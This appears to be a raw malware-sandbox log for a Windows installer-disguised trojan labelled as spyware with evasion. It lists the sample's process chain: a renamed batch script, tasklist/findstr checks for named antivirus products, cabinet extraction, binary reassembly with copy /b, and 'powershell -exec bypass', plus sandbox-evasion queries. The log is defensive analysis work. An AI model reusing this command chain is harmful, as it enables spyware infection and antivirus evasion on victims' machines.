      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49821 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.213.115:443 -> 192.168.2.5:49831 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.5:49836 version: TLS 1.2
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\OnceBusinessesJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\BuysGothicJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\RdBelievesJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeFile created: C:\Windows\HierarchyConstantlyJump to behavior
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\!Set-up..exeCode function: String function: 004062CF appears 58 times
      Source: !Set-up..exe Static PE information: invalid certificate
      Source: !Set-up..exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/28@3/2
      Source: C:\Users\user\Desktop\!Set-up..exe Code function: 0_2_004024FB CoCreateInstance
      Source: C:\Users\user\Desktop\!Set-up..exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scout
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4012:120:WilError_03
      Source: C:\Users\user\Desktop\!Set-up..exe File created: C:\Users\user\AppData\Local\Temp\nsoCE2E.tmp
      Source: !Set-up..exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\!Set-up..exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\!Set-up..exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: !Set-up..exe Virustotal: Detection: 15%
      Source: !Set-up..exe ReversingLabs: Detection: 16%
      Source: C:\Users\user\Desktop\!Set-up..exe File read: C:\Users\user\Desktop\!Set-up..exe
      Source: unknown Process created: C:\Users\user\Desktop\!Set-up..exe "C:\Users\user\Desktop\!Set-up..exe"
      Source: C:\Users\user\Desktop\!Set-up..exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: riched20.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: usp10.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: msls31.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: textinputframework.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: coreuicomponents.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: coremessaging.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: textshaping.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: edputil.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: appresolver.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: bcp47langs.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: slc.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: sppc.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: wsock32.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: napinsp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: pnrpnsp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: wshbth.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: nlaapi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: winrnr.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: webio.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: winnsi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: fwpuclnt.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: schannel.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: mskeyprotect.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: ncryptsslp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: msasn1.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: gpapi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: dpapi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: wbemcomn.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: amsi.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\!Set-up..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: !Set-up..exe Static file information: File size 14866519 > 1048576
      Source: !Set-up..exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\!Set-up..exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
      Source: C:\Users\user\Desktop\!Set-up..exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | System information queried: FirmwareTableInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2559
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 6640 | Thread sleep time: -90000s >= -30000s
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com TID: 6568 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5492 | Thread sleep count: 2559 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508 | Thread sleep count: 254 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4612 | Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: C:\Users\user\Desktop\!Set-up..exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\!Set-up..exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
      Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\!Set-up..exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\!Set-up..exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 71992
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Ec
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Ratio" Returning
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com Banned.com V
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
